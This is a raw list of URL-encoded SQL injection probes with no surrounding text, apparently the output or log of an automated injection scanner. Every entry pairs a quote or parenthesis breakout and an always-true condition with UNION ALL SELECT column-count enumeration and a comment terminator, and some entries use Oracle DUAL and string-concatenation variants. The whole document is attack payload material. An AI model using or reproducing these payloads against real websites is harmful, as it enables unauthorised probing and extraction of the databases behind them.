-7767%22%20UNION%20ALL%20SELECT%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234%2C%204234--%20%20AND%20%22KCCP%22%20LIKE%20%22KCCP -3450%22%20UNION%20ALL%20SELECT%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570%2C%207570--%20%20AND%20%22anSt%22%20LIKE%20%22anSt -8132%22%20UNION%20ALL%20SELECT%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514--%20%20AND%20%22PiBW%22%20LIKE%20%22PiBW -6213%22%20UNION%20ALL%20SELECT%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391--%20%20AND%20%22TgJi%22%20LIKE%20%22TgJi -5370%29%20WHERE%205112%3D5112%20UNION%20ALL%20SELECT%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112%2C%205112--%20 -1797%29%20WHERE%209590%3D9590%20UNION%20ALL%20SELECT%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590%2C%209590--%20 -1626%29%20WHERE%209063%3D9063%20UNION%20ALL%20SELECT%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063%2C%209063--%20 -5412%29%20WHERE%208349%3D8349%20UNION%20ALL%20SELECT%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349%2C%208349--%20 -4400%29%20WHERE%204574%3D4574%20UNION%20ALL%20SELECT%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574%2C%204574--%20 -4513%29%20WHERE%206220%3D6220%20UNION%20ALL%20SELECT%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220%2C%206220--%20 -1085%29%20WHERE%206283%3D6283%20UNION%20ALL%20SELECT%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283--%20 -5785%29%20WHERE%203709%3D3709%20UNION%20ALL%20SELECT%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709--%20 -7673%29%20WHERE%209940%3D9940%20UNION%20ALL%20SELECT%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940%2C%209940--%20 -4549%29%20WHERE%202016%3D2016%20UNION%20ALL%20SELECT%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016%2C%202016--%20 -6656%27%29%20WHERE%203547%3D3547%20UNION%20ALL%20SELECT%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547%2C%203547--%20 -1705%27%29%20WHERE%204374%3D4374%20UNION%20ALL%20SELECT%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374%2C%204374--%20 -5434%27%29%20WHERE%203334%3D3334%20UNION%20ALL%20SELECT%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334%2C%203334--%20 -7937%27%29%20WHERE%207531%3D7531%20UNION%20ALL%20SELECT%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531%2C%207531--%20 -7802%27%29%20WHERE%204597%3D4597%20UNION%20ALL%20SELECT%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597%2C%204597--%20 -8755%27%29%20WHERE%208622%3D8622%20UNION%20ALL%20SELECT%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622%2C%208622--%20 -8057%27%29%20WHERE%202116%3D2116%20UNION%20ALL%20SELECT%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116--%20 -9405%27%29%20WHERE%204797%3D4797%20UNION%20ALL%20SELECT%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797%2C%204797--%20 -9438%27%29%20WHERE%201462%3D1462%20UNION%20ALL%20SELECT%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462%2C%201462--%20 -7375%27%29%20WHERE%206501%3D6501%20UNION%20ALL%20SELECT%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501--%20 -8283%27%20WHERE%201668%3D1668%20UNION%20ALL%20SELECT%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668--%20 -8340%27%20WHERE%204877%3D4877%20UNION%20ALL%20SELECT%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877--%20 -5542%27%20WHERE%209262%3D9262%20UNION%20ALL%20SELECT%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262--%20 -8209%27%20WHERE%207916%3D7916%20UNION%20ALL%20SELECT%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916%2C%207916--%20 -4301%27%20WHERE%206768%3D6768%20UNION%20ALL%20SELECT%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768--%20 -6656%27%20WHERE%209098%3D9098%20UNION%20ALL%20SELECT%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098%2C%209098--%20 -9961%27%20WHERE%207770%3D7770%20UNION%20ALL%20SELECT%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770%2C%207770--%20 -4510%27%20WHERE%209399%3D9399%20UNION%20ALL%20SELECT%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399%2C%209399--%20 -3211%27%20WHERE%202792%3D2792%20UNION%20ALL%20SELECT%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792%2C%202792--%20 -2302%27%20WHERE%209546%3D9546%20UNION%20ALL%20SELECT%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546%2C%209546--%20 -2692%22%20WHERE%206337%3D6337%20UNION%20ALL%20SELECT%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337--%20 -1840%22%20WHERE%203318%3D3318%20UNION%20ALL%20SELECT%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318%2C%203318--%20 -1186%22%20WHERE%209576%3D9576%20UNION%20ALL%20SELECT%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576--%20 -3185%22%20WHERE%204017%3D4017%20UNION%20ALL%20SELECT%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017%2C%204017--%20 -2626%22%20WHERE%202630%3D2630%20UNION%20ALL%20SELECT%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630%2C%202630--%20 -1166%22%20WHERE%201268%3D1268%20UNION%20ALL%20SELECT%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268%2C%201268--%20 -2214%22%20WHERE%201285%3D1285%20UNION%20ALL%20SELECT%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285--%20 -1933%22%20WHERE%206445%3D6445%20UNION%20ALL%20SELECT%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445%2C%206445--%20 -4031%22%20WHERE%205655%3D5655%20UNION%20ALL%20SELECT%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655%2C%205655--%20 -3865%22%20WHERE%209087%3D9087%20UNION%20ALL%20SELECT%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087--%20 -8355%27%20%7C%7C%20%28SELECT%204986%20FROM%20DUAL%20WHERE%205438%3D5438%20UNION%20ALL%20SELECT%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438--%20%20%29%20%7C%7C%20%27 -6398%27%20%7C%7C%20%28SELECT%209535%20FROM%20DUAL%20WHERE%205383%3D5383%20UNION%20ALL%20SELECT%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383%2C%205383--%20%20%29%20%7C%7C%20%27 -1699%27%20%7C%7C%20%28SELECT%203647%20FROM%20DUAL%20WHERE%206876%3D6876%20UNION%20ALL%20SELECT%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876%2C%206876--%20%20%29%20%7C%7C%20%27 -6442%27%20%7C%7C%20%28SELECT%205767%20FROM%20DUAL%20WHERE%202632%3D2632%20UNION%20ALL%20SELECT%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632--%20%20%29%20%7C%7C%20%27 -4279%27%20%7C%7C%20%28SELECT%208062%20FROM%20DUAL%20WHERE%202465%3D2465%20UNION%20ALL%20SELECT%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465%2C%202465--%20%20%29%20%7C%7C%20%27 -1913%27%20%7C%7C%20%28SELECT%201611%20FROM%20DUAL%20WHERE%209870%3D9870%20UNION%20ALL%20SELECT%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870--%20%20%29%20%7C%7C%20%27 -7857%27%20%7C%7C%20%28SELECT%206436%20FROM%20DUAL%20WHERE%207069%3D7069%20UNION%20ALL%20SELECT%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069%2C%207069--%20%20%29%20%7C%7C%20%27 -1807%27%20%7C%7C%20%28SELECT%206656%20FROM%20DUAL%20WHERE%203971%3D3971%20UNION%20ALL%20SELECT%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971%2C%203971--%20%20%29%20%7C%7C%20%27 -4829%27%20%7C%7C%20%28SELECT%203017%20FROM%20DUAL%20WHERE%205944%3D5944%20UNION%20ALL%20SELECT%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944--%20%20%29%20%7C%7C%20%27 -4230%27%20%7C%7C%20%28SELECT%202461%20FROM%20DUAL%20WHERE%203467%3D3467%20UNION%20ALL%20SELECT%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467%2C%203467--%20%20%29%20%7C%7C%20%27 -9986%27%20%7C%7C%20%28SELECT%207025%20WHERE%209606%3D9606%20UNION%20ALL%20SELECT%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606%2C%209606--%20%20%29%20%7C%7C%20%27 -5975%27%20%7C%7C%20%28SELECT%203805%20WHERE%209377%3D9377%20UNION%20ALL%20SELECT%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377--%20%20%29%20%7C%7C%20%27 -1566%27%20%7C%7C%20%28SELECT%208017%20WHERE%203991%3D3991%20UNION%20ALL%20SELECT%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991%2C%203991--%20%20%29%20%7C%7C%20%27 -7023%27%20%7C%7C%20%28SELECT%209004%20WHERE%206575%3D6575%20UNION%20ALL%20SELECT%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575%2C%206575--%20%20%29%20%7C%7C%20%27 -6450%27%20%7C%7C%20%28SELECT%208373%20WHERE%206546%3D6546%20UNION%20ALL%20SELECT%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546%2C%206546--%20%20%29%20%7C%7C%20%27 -8225%27%20%7C%7C%20%28SELECT%202979%20WHERE%204030%3D4030%20UNION%20ALL%20SELECT%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030--%20%20%29%20%7C%7C%20%27 -8209%27%20%7C%7C%20%28SELECT%204988%20WHERE%205451%3D5451%20UNION%20ALL%20SELECT%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451%2C%205451--%20%20%29%20%7C%7C%20%27 -6634%27%20%7C%7C%20%28SELECT%207002%20WHERE%202389%3D2389%20UNION%20ALL%20SELECT%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389%2C%202389--%20%20%29%20%7C%7C%20%27 -6044%27%20%7C%7C%20%28SELECT%201787%20WHERE%201589%3D1589%20UNION%20ALL%20SELECT%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589%2C%201589--%20%20%29%20%7C%7C%20%27 -2894%27%20%7C%7C%20%28SELECT%203985%20WHERE%207975%3D7975%20UNION%20ALL%20SELECT%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975--%20%20%29%20%7C%7C%20%27 -5733%20%2B%20%28SELECT%203135%20FROM%20DUAL%20WHERE%208169%3D8169%20UNION%20ALL%20SELECT%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169--%20%20%29 -7824%20%2B%20%28SELECT%208990%20FROM%20DUAL%20WHERE%202850%3D2850%20UNION%20ALL%20SELECT%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850%2C%202850--%20%20%29 -7068%20%2B%20%28SELECT%203465%20FROM%20DUAL%20WHERE%207575%3D7575%20UNION%20ALL%20SELECT%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575%2C%207575--%20%20%29 -1238%20%2B%20%28SELECT%203014%20FROM%20DUAL%20WHERE%209456%3D9456%20UNION%20ALL%20SELECT%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456%2C%209456--%20%20%29 -9661%20%2B%20%28SELECT%202910%20FROM%20DUAL%20WHERE%206344%3D6344%20UNION%20ALL%20SELECT%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344--%20%20%29 -8113%20%2B%20%28SELECT%208072%20FROM%20DUAL%20WHERE%206734%3D6734%20UNION%20ALL%20SELECT%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734--%20%20%29 -8547%20%2B%20%28SELECT%202993%20FROM%20DUAL%20WHERE%205306%3D5306%20UNION%20ALL%20SELECT%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306%2C%205306--%20%20%29 -9615%20%2B%20%28SELECT%209316%20FROM%20DUAL%20WHERE%206339%3D6339%20UNION%20ALL%20SELECT%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339%2C%206339--%20%20%29 -6524%20%2B%20%28SELECT%209510%20FROM%20DUAL%20WHERE%203276%3D3276%20UNION%20ALL%20SELECT%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276%2C%203276--%20%20%29 